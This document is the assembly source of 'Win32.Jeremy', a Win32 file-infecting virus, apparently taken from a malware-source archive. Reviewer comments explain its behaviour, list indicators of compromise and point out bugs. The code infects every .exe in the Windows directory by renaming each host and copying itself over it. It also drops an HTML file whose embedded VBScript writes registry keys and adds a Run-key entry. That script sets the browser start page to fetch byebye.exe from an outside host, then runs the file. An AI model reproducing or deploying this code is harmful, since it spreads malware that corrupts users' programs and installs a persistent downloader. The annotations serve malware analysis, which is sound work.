MalwareSourceCode/Win32/Infector/Win32.Jeremy.Memorial.asm

Contribution - Win32.Jeremy [by Necronomikon]
;********************************
;******** Win32.Jeremy **********
;(c)by Necronomikon /ZeroGravity
;********************************
;Written for one of my real friends who,died through an car accident..... :(
;
;In memories for:
;-----------------
;Jeremy Stephan Garcia
;* 17.05.1984
;+ 08.04.2004
; NOTE(review): analyst annotations only — the code below is an unmodified,
; live Win32 file infector. Do not assemble or run it outside an isolated lab.
; The syntax is TASM/MASM (.model, offset, dup, extrn …:proc, @@labels), not NASM.
.586p                          ; Pentium instruction set, privileged instructions allowed
.model flat                    ; 32-bit flat memory model (Win32)
JUMPS                          ; TASM: auto-extend out-of-range conditional jumps
.data
; --- infector state -------------------------------------------------------
; Behaviour of the EXE (see .code): show a message box, WinExec nFileName,
; chdir to the Windows directory, and for every *.exe found there rename the
; host to <base>.dat., copy this executable over the host's name and patch the
; host's new name into the copy at file offset _off_. At the end of the
; enumeration it drops %WINDIR%\jeremy.htm (the htm_ table) — and then loops
; forever in @@dropfile/nextfile, see the .code comments.
handle1 db 50 dup(0)           ; zero-filled; passed to GetModuleHandleA as lpModuleName, i.e. an empty string (not NULL)
handle2 db 50 dup(0)           ; own executable path from GetModuleFileNameA (nSize=50 — longer paths are truncated by the API)
maska db '*.exe',0             ; FindFirstFileA mask, relative to the Windows directory after SetCurrentDirectoryA
zgrext db 'dat.',0             ; replacement "extension" for renamed hosts; only the 4 bytes 'dat.' are copied (two movsw), the NUL is not
handle_ dd 0                   ; FindFirstFileA search handle (never passed to FindClose)
_handle dd 0                   ; handle returned by CreateFileA in the infection routine
; Find-data record passed to FindFirstFileA/FindNextFileA.
; NOTE(review): laid out like WIN32_FIND_DATAA, but cFileName (nFileName) is 50
; bytes here instead of MAX_PATH (260), so the record is 108 bytes while the API
; fills a 318-byte structure. The API's cFileName spans record offsets 44..303 and
; cAlternateFileName 304..317, i.e. they land on top of nAltFileName, newfilename,
; path2 and the start of path3 on every FindFirst/FindNext call.
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
nFileName db 50 dup('N')       ; cFileName: current match. Also the string WinExec'd at `real`. A pristine build holds
                               ; 50 'N' bytes with no NUL of its own (the NUL comes from nAltFileName); presumably this
                               ; is the field the infection routine patches at _off_ in each copy — TODO confirm offset
nAltFileName db 14 dup(0)
newfilename db 50 dup(0)       ; host name with everything from the first '.' on replaced by 'dat.'; no terminator is stored
path2 db 25 dup(0)             ; Windows directory from GetWindowsDirectoryA(path2, 25)
path3 db 260 dup(0)            ; original current directory (GetCurrentDirectoryA); written, never read
; Caption and text of the MessageBoxA shown at entry (on every run, infected hosts included).
szTitle db "*** Win32.Jeremy ***",0
szMessage db "*****************************************************************************",13,10
db "**Written for one of my friends,who died through an car accident**",13,10
db "*****************************************************************************",13,10
db "** (c) by Necronomikon / ZeroGravity **",13,10
db "*****************************************************************************",0
; --- dropped-file bookkeeping (used by @@dropfile) ---
htm_handle dd ?                ; handle returned by _lcreat for the dropped HTML file
htmdropper db '\jeremy.htm', 0 ; file name appended to the Windows directory via lstrcat
szhtm db 220 dup (0)           ; full path of the dropped file (Windows dir + htmdropper)
; --- embedded payload: jeremy.htm -------------------------------------------
; Raw bytes (decimal ASCII) of the HTML file written by @@dropfile; the trailing
; 0 is part of the file (script_size2 counts it). Decoded, it is a memorial page
; followed by a <Script Language=vbs> block which, when executed by the Windows
; Script Host:
;   1. writes a marker string under HKCU\software\win32Jeremy\
;   2. copies itself (wscript.scriptfullname) to GetSpecialFolder(0)\jeremy.vbs
;      (FSO GetSpecialFolder(0) is the Windows folder)
;   3. reads HKCU\Software\Microsoft\Internet Explorer\Download Directory,
;      defaulting to "c:" when empty
;   4. if \byebye.exe exists in neither folder: sets the IE start page to
;      http://win32jeremy.tripod.com/byebye.exe and writes the default value of
;      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUN to
;      <Windows folder>\byebye.exe
;   5. otherwise: resets the start page to about:blank, copies byebye.exe from
;      the download directory into the Windows folder and runs it.
; i.e. a two-stage downloader for a second executable that is NOT in this file.
; IOCs: HKCU\software\win32Jeremy, %WINDIR%\jeremy.htm, %WINDIR%\jeremy.vbs,
;       byebye.exe, win32jeremy.tripod.com.
; NOTE(review): wscript.scriptfullname is a WSH object property; presumably the
; self-copy line errors when the .htm is merely rendered in a browser — not verified.
; Trailing comments below mark where the decoded fragments start.
htm_ db 60,104,116,109,108,62,13,10,13,10,60,98,111,100,121,32   ; "<html>\r\n\r\n<body "
db 98,103,99,111,108,111,114,61,34,98,108,97,99,107,34,32
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,118
db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,97
db 108,105,110,107,61,34,35,102,102,48,48,48,48,34,32,116
db 101,120,116,61,108,105,109,101,62,13,10,60,99,101,110,116
db 101,114,62,13,10,60,98,114,62,13,10,60,102,111,110,116
db 32,115,105,122,101,61,43,50,62,60,117,62,60,98,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,56   ; per-letter <font color=…> spans spelling "Win32.Jeremy"
db 48,70,70,34,62,87,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,56,67,69
db 56,34,62,105,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,57,55,68,49,34
db 62,110,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,65,51,66,57,34,62,51
db 60,47,102,111,110,116,62,60,102,111,110,116,32,99,111,108
db 111,114,61,34,35,48,48,65,69,65,50,34,62,50,60,47
db 102,111,110,116,62,60,102,111,110,116,32,99,111,108,111,114
db 61,34,35,48,48,66,65,56,66,34,62,46,60,47,102,111
db 110,116,62,60,102,111,110,116,32,99,111,108,111,114,61,34
db 35,48,48,67,53,55,52,34,62,74,60,47,102,111,110,116
db 62,60,102,111,110,116,32,99,111,108,111,114,61,34,35,48
db 48,68,49,53,68,34,62,101,60,47,102,111,110,116,62,60
db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,68
db 67,52,54,34,62,114,60,47,102,111,110,116,62,60,102,111
db 110,116,32,99,111,108,111,114,61,34,35,48,48,69,56,50
db 69,34,62,101,60,47,102,111,110,116,62,60,102,111,110,116
db 32,99,111,108,111,114,61,34,35,48,48,70,51,49,55,34
db 62,109,60,47,102,111,110,116,62,60,102,111,110,116,32,99
db 111,108,111,114,61,34,35,48,48,70,70,48,48,34,62,121
db 60,47,102,111,110,116,62,60,47,102,111,110,116,62,60,47
db 117,62,60,98,114,62,60,98,114,62,60,98,114,62,13,10
db 60,116,105,116,108,101,62,46,46,46,97,110,100,32,111,110   ; "<title>...and once again one of my pals...!?</title>"
db 99,101,32,97,103,97,105,110,32,111,110,101,32,111,102,32
db 109,121,32,112,97,108,115,46,46,46,33,63,60,47,116,105
db 116,108,101,62,13,10,60,102,111,110,116,32,115,105,122,101
db 61,45,49,32,99,111,108,111,114,61,119,104,105,116,101,62
db 43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,60
db 98,114,62,60,98,114,62,13,10,87,114,105,116,116,101,110   ; memorial text / credits
db 32,102,111,114,32,111,110,101,32,111,102,32,109,121,32,102
db 114,105,101,110,100,115,32,119,104,111,32,100,105,101,100,32
db 116,104,114,111,117,103,104,32,97,110,32,99,97,114,32,97
db 99,99,105,100,101,110,116,13,10,60,98,114,62,60,98,114
db 62,13,10,40,99,41,111,100,101,100,32,105,110,32,71,101
db 114,109,97,110,89,32,50,111,111,52,60,98,114,62,60,98
db 114,62,98,121,32,78,101,99,114,111,110,111,109,105,107,111
db 110,47,90,101,114,111,71,114,97,118,105,116,121,60,98,114
db 62,13,10,60,98,114,62,60,98,114,62,60,47,102,111,110
db 116,62,13,10,60,83,99,114,105,112,116,32,76,97,110,103   ; "</font>\r\n<Script Language=vbs>" — embedded VBScript starts here
db 117,97,103,101,61,118,98,115,62,13,10,114,101,109,32,119
db 105,110,51,50,46,106,101,114,101,109,121,13,10,114,101,109
db 32,40,99,41,32,98,121,32,78,101,99,114,111,110,111,109
db 105,107,111,110,47,90,71,13,10,83,101,116,32,100,111,119   ; Set downloader = CreateObject("WScript.Shell")
db 110,108,111,97,100,101,114,32,61,32,67,114,101,97,116,101
db 79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46
db 83,104,101,108,108,34,41,13,10,100,111,119,110,108,111,97   ; downloader.regwrite "HKCU\software\win32Jeremy\", "(c)by Necronomikon/ZeroGravity"
db 100,101,114,46,114,101,103,119,114,105,116,101,32,34,72,75
db 67,85,92,115,111,102,116,119,97,114,101,92,119,105,110,51
db 50,74,101,114,101,109,121,92,34,44,32,34,40,99,41,98
db 121,32,78,101,99,114,111,110,111,109,105,107,111,110,47,90
db 101,114,111,71,114,97,118,105,116,121,34,13,10,83,101,116   ; Set Jeremy= Createobject("scripting.filesystemobject")
db 32,74,101,114,101,109,121,61,32,67,114,101,97,116,101,111
db 98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103
db 46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99
db 116,34,41,13,10,74,101,114,101,109,121,46,99,111,112,121   ; Jeremy.copyfile wscript.scriptfullname, Jeremy.GetSpecialFolder(0)&_ "\jeremy.vbs"
db 102,105,108,101,32,119,115,99,114,105,112,116,46,115,99,114
db 105,112,116,102,117,108,108,110,97,109,101,44,74,101,114,101
db 109,121,46,71,101,116,83,112,101,99,105,97,108,70,111,108
db 100,101,114,40,48,41,38,95,13,10,34,92,106,101,114,101
db 109,121,46,118,98,115,34,13,10,90,71,114,97,118,105,116   ; ZGravity= ""
db 121,61,32,34,34,13,10,90,71,114,97,118,105,116,121,61
db 32,100,111,119,110,108,111,97,100,101,114,46,114,101,103,114   ; ZGravity= downloader.regread("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
db 101,97,100,40,34,72,75,67,85,92,83,111,102,116,119,97
db 114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116
db 101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,68
db 111,119,110,108,111,97,100,32,68,105,114,101,99,116,111,114
db 121,34,41,13,10,73,102,32,40,90,71,114,97,118,105,116   ; If (ZGravity= "") Then ZGravity = "c:" End If
db 121,61,32,34,34,41,32,84,104,101,110,13,10,90,71,114
db 97,118,105,116,121,32,61,32,34,99,58,34,13,10,69,110
db 100,32,73,102,13,10,73,102,32,82,105,103,104,116,40,90   ; If Right(ZGravity, 1) = " \ " Then ZGravity = Mid(ZGravity, 1, Len(ZGravity) - 1)  (note: compares with " \ " including spaces)
db 71,114,97,118,105,116,121,44,32,49,41,32,61,32,34,32
db 92,32,34,32,84,104,101,110,32,90,71,114,97,118,105,116
db 121,32,61,32,77,105,100,40,90,71,114,97,118,105,116,121
db 44,32,49,44,32,76,101,110,40,90,71,114,97,118,105,116
db 121,41,32,45,32,49,41,13,10,73,102,32,78,111,116,32   ; If Not (Jeremy.fileexists(Jeremy.getspecialfolder(0) & "\byebye.exe")) Then
db 40,74,101,114,101,109,121,46,102,105,108,101,101,120,105,115
db 116,115,40,74,101,114,101,109,121,46,103,101,116,115,112,101
db 99,105,97,108,102,111,108,100,101,114,40,48,41,32,38,32
db 34,92,98,121,101,98,121,101,46,101,120,101,34,41,41,32
db 84,104,101,110,13,10,73,102,32,78,111,116,32,40,74,101   ; If Not (Jeremy.fileexists(ZGravity & "\byebye.exe")) Then
db 114,101,109,121,46,102,105,108,101,101,120,105,115,116,115,40
db 90,71,114,97,118,105,116,121,32,38,32,34,92,98,121,101
db 98,121,101,46,101,120,101,34,41,41,32,84,104,101,110,13
db 10,100,111,119,110,108,111,97,100,101,114,46,114,101,103,119   ; downloader.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",_
db 114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119
db 97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110
db 116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92
db 77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34
db 44,95,13,10,34,104,116,116,112,58,47,47,119,105,110,51   ; "http://win32jeremy.tripod.com/byebye.exe"  <-- download URL (IOC)
db 50,106,101,114,101,109,121,46,116,114,105,112,111,100,46,99
db 111,109,47,98,121,101,98,121,101,46,101,120,101,34,13,10
db 100,111,119,110,108,111,97,100,101,114,46,114,101,103,119,114   ; downloader.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUN",_ Jeremy.getspecialfolder(0) & "\byebye.exe"  (persistence)
db 105,116,101,32,34,72,75,69,89,95,67,85,82,82,69,78
db 84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92
db 77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119
db 115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110
db 92,82,85,78,34,44,95,13,10,74,101,114,101,109,121,46
db 103,101,116,115,112,101,99,105,97,108,102,111,108,100,101,114
db 40,48,41,32,38,32,34,92,98,121,101,98,121,101,46,101
db 120,101,34,13,10,69,108,115,101,13,10,100,111,119,110,108   ; Else: downloader.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page",_ "about:blank"
db 111,97,100,101,114,46,114,101,103,119,114,105,116,101,32,34
db 72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69
db 82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111
db 115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120
db 112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114
db 116,32,80,97,103,101,34,44,95,13,10,34,97,98,111,117
db 116,58,98,108,97,110,107,34,13,10,74,101,114,101,109,121   ; Jeremy.copyfile ZGravity & "\byebye.exe",_ Jeremy.getspecialfolder(0) & "\byebye.exe"
db 46,99,111,112,121,102,105,108,101,32,90,71,114,97,118,105
db 116,121,32,38,32,34,92,98,121,101,98,121,101,46,101,120
db 101,34,44,95,13,10,74,101,114,101,109,121,46,103,101,116
db 115,112,101,99,105,97,108,102,111,108,100,101,114,40,48,41
db 32,38,32,34,92,98,121,101,98,121,101,46,101,120,101,34
db 13,10,100,111,119,110,108,111,97,100,101,114,46,114,117,110   ; downloader.run Jeremy.getspecialfolder(0) & "\byebye.exe", 1, False  (executes the second stage)
db 32,74,101,114,101,109,121,46,103,101,116,115,112,101,99,105
db 97,108,102,111,108,100,101,114,40,48,41,32,38,32,34,92
db 98,121,101,98,121,101,46,101,120,101,34,44,32,49,44,32
db 70,97,108,115,101,13,10,101,110,100,32,105,102,13,10,60   ; "end if\r\n</script>\r\n</BODY>\r\n</html>\r\n\r\n" + NUL
db 47,115,99,114,105,112,116,62,13,10,60,47,66,79,68,89
db 62,13,10,60,47,104,116,109,108,62,13,10,13,10,0
script_size2 equ $-htm_        ; byte count of the table above, including the trailing NUL, passed to _lwrite
_off_ equ 2722d                ; file offset at which the infection routine writes newfilename into each copy.
                               ; Presumably where nFileName sits in this build's on-disk image — TODO verify
                               ; against the built binary; any change to the .data layout above invalidates it.
include useful.inc
.code
; api NAME — declare NAME as an external procedure and call it.
; Every Win32 import below goes through this macro. Arguments are pushed by the
; caller beforehand (stdcall: right to left) and popped by the callee, so a
; wrong push count silently unbalances the stack rather than failing to assemble.
api macro a
extrn a:proc
call a
endm
; jeremy — program entry point (`end jeremy`). Shows the memorial message box on
; every run (infected hosts included), then falls through into `real`.
; MessageBoxA(hWnd=0, lpText=szMessage, lpCaption=szTitle, uType=0 /* MB_OK */)
jeremy:
push 00000000h ; uType = 0 (MB_OK)
push offset szTitle ; lpCaption
push offset szMessage ; lpText
push 00000000h ; hWnd = NULL
api MessageBoxA
; real — launch the (renamed) host, move into the Windows directory and start
; enumerating *.exe there. Falls through into `check` with the first match.
real:
push 00000001 ; uCmdShow = 1 (SW_SHOWNORMAL)
push offset nFileName ; WinExec(nFileName, 1). In a pristine build nFileName is 50 'N's, so this
                      ; fails harmlessly; in an infected copy the infection routine has presumably
                      ; patched this field (see _off_) with the host's new <base>.dat. name, which
                      ; is how the original program still gets run.
api WinExec
push offset path3
push 260
api GetCurrentDirectoryA ; GetCurrentDirectoryA(260, path3) — path3 is never read afterwards
push 25
push offset path2
api GetWindowsDirectoryA ; GetWindowsDirectoryA(path2, 25): with only 25 bytes a longer Windows path is
                         ; not copied (the API returns the required size instead), leaving path2 empty
push offset path2
api SetCurrentDirectoryA ; every later relative file operation targets the Windows directory
push offset handle1
api GetModuleHandleA ; lpModuleName = handle1, an empty string rather than NULL; whatever this
                     ; returns is used unchecked as hModule below
push 50
push offset handle2
push eax
api GetModuleFileNameA ; handle2 = path of that module (this EXE if eax is the process module), at most 50 bytes
push offset filedta
push offset maska
api FindFirstFileA ; FindFirstFileA("*.exe", filedta)
mov dword ptr [handle_],eax
cmp eax, 0
je @@dropfile ; NOTE(review): FindFirstFileA signals failure with INVALID_HANDLE_VALUE (-1), not 0,
              ; so this test never fires; on failure `check` runs with nFileName still 'N'x50
; check — infect the file currently in nFileName:
;   1. skip names the author wanted to exclude (broken, see below),
;   2. newfilename = name up to the first '.' + 'dat.',
;   3. MoveFileA host -> newfilename, CopyFileA own EXE -> host's name,
;   4. write newfilename into the copy at file offset _off_.
; Then jumps to `nextfile`.
check:
mov bx, word ptr[nFileName] ; bx = first TWO characters of the name
cmp bx, 'J' ; NOTE(review): 16-bit compare against a one-byte immediate (004Ah): it only matches a
je nextfile ; one-character name "J" followed by NUL. Whatever first-letter / "JEREMY" exclusion
cmp bx, 'E' ; was intended never fires for real file names, so nothing is skipped. The 'E' test
je nextfile ; is also duplicated below.
cmp bx, 'R'
je nextfile
cmp bx, 'E'
je nextfile
cmp bx, 'M'
je nextfile
cmp bx, 'Y'
je nextfile
lea esi, [nFileName]
lea edi, [newfilename]
stowit:
lodsb ; copy the name up to (not including) the first '.'. There is no length bound: if the
cmp al, '.' ; buffer holds no '.' (e.g. the 'N'x50 case after an undetected FindFirstFileA
je addext ; failure) the loop keeps reading and writing through the following data fields
stosb
jmp stowit
addext:
stosb ; store the '.'
lea esi, [zgrext]
movsw ; append 'dat.' (4 bytes). zgrext's terminating NUL is not copied, so newfilename is
movsw ; only terminated if the bytes beyond are still zero — not the case after a longer name
push 0 ; extra dword: MoveFileA takes 2 arguments, so this one stays on the stack
push offset newfilename
push offset nFileName
api MoveFileA ; MoveFileA(nFileName, newfilename): host foo.exe -> foo.dat.
;api lstrcat
push 0 ; bFailIfExists = FALSE
push offset nFileName
push offset handle2
api CopyFileA ; CopyFileA(handle2, nFileName, FALSE): this EXE is copied over the host's original name
push 2
push offset nFileName
api CreateFileA ; NOTE(review): only 2 of CreateFileA's 7 arguments are pushed; the callee reads the
                ; other five from whatever is on the stack and pops 28 bytes. The argument shape
                ; (path, 2 = OF_READWRITE) and the _lclose below look like _lopen was intended.
mov dword ptr [_handle],eax
push dword 0 ; dwMoveMethod = 0 (FILE_BEGIN)
push 0 ; lpDistanceToMoveHigh = NULL
push _off_ ; lDistanceToMove = 2722
push eax ; hFile
api SetFilePointer ; seek to _off_ inside the fresh copy
mov eax, dword ptr [_handle]
push 50 ; nNumberOfBytesToWrite = whole newfilename buffer
push offset newfilename
push eax
api WriteFile ; NOTE(review): lpNumberOfBytesWritten and lpOverlapped are not pushed — WriteFile
              ; takes them from stack garbage
push eax ; eax is WriteFile's BOOL result, not the handle...
api _lclose ; ...so a bogus value is closed and the handle in _handle is leaked
jmp nextfile
je real ; unreachable: follows an unconditional jmp
; @@dropfile — write the embedded htm_ table to %WINDIR%\jeremy.htm.
; Reached whenever FindNextFileA returns 0, i.e. at the end of the enumeration
; (the FindFirstFileA path never gets here, see `real`). It then falls through
; into `nextfile`, whose FindNextFileA on the exhausted handle returns 0 again
; and jumps back here: the file is re-created in an endless loop and `bailout`
; (ExitProcess) is never reached.
@@dropfile:
push 50 ; uSize = 50 (szhtm is 220 bytes)
push offset szhtm
api GetWindowsDirectoryA ; szhtm = Windows directory
push offset htmdropper
push offset szhtm
api lstrcat ; szhtm += "\jeremy.htm"
push 0 ; iAttribute = 0 (normal)
push offset szhtm
api _lcreat ; _lcreat(szhtm, 0): create or truncate the file
mov [htm_handle],eax
push script_size2
push offset htm_
push [htm_handle]
api _lwrite ; write the whole htm_ table, trailing NUL included
push [htm_handle]
api _lclose
push 0 ; uCmdShow = 0 (SW_HIDE)
push edi ; NOTE(review): lpCmdLine = whatever edi happens to hold; nothing sets it for this call.
         ; Coming from the copy loop it points just past 'dat.' in newfilename (zero bytes if the
         ; buffer was clean), otherwise it is whatever the last iteration or the loader left.
         ; Presumably meant to launch the dropped file (WinExec also would not open an .htm).
api WinExec
; nextfile — advance the *.exe enumeration. Next match -> `check`; when
; FindNextFileA returns FALSE (0) -> @@dropfile (which loops back here, so the
; program never terminates on its own). The search handle is never FindClose'd.
nextfile:
push offset filedta
mov eax, dword ptr [handle_]
push eax
api FindNextFileA ; FindNextFileA(handle_, filedta)
cmp eax, 0
je @@dropfile ; end of enumeration (or any error) -> drop the HTML
jmp check
; bailout — intended clean exit. Nothing jumps here, so ExitProcess is never called.
bailout:
push 0 ; uExitCode = 0
api ExitProcess
end jeremy ; entry point = jeremy